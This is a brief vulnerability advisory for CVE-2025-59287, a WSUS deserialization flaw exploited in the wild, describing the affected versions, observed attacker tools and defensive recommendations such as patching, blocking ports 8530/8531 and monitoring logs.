CVE-2025-59287

Name of the Vulnerable Software and Affected Versions Windows Server Update Service (WSUS) versions prior to the October 24, 2025 patch.

Description A critical remote code execution (RCE) vulnerability exists in Windows Server Update Service (WSUS) due to unsafe deserialization of untrusted data. This allows unauthenticated attackers to execute arbitrary code with SYSTEM privileges. The vulnerability, identified as CVE-2025-59287, has been actively exploited in the wild, with attackers using it to deploy malware such as ShadowPad. Exploitation involves sending crafted requests to the WSUS service, potentially through the

ClientWebService

or

SimpleAuthWebService

endpoints. Attackers have been observed using tools like PowerCat, curl, and certutil to gain shell access and install malicious payloads. CISA has added CVE-2025-59287 to its Known Exploited Vulnerabilities Catalog, requiring federal agencies to patch by November 14, 2025. Several threat actors, including those associated with China, have been observed exploiting this vulnerability.

Recommendations Apply the out-of-band security update released by Microsoft on October 24, 2025, to address CVE-2025-59287. If patching is not immediately possible, consider disabling the WSUS role or blocking inbound traffic on ports 8530 and 8531. Monitor WSUS server logs for suspicious activity, including unusual network traffic and attempts to exploit the vulnerability. Implement YARA rules to detect exploitation attempts. Verify that the patch has been successfully applied and review system configurations for any signs of compromise.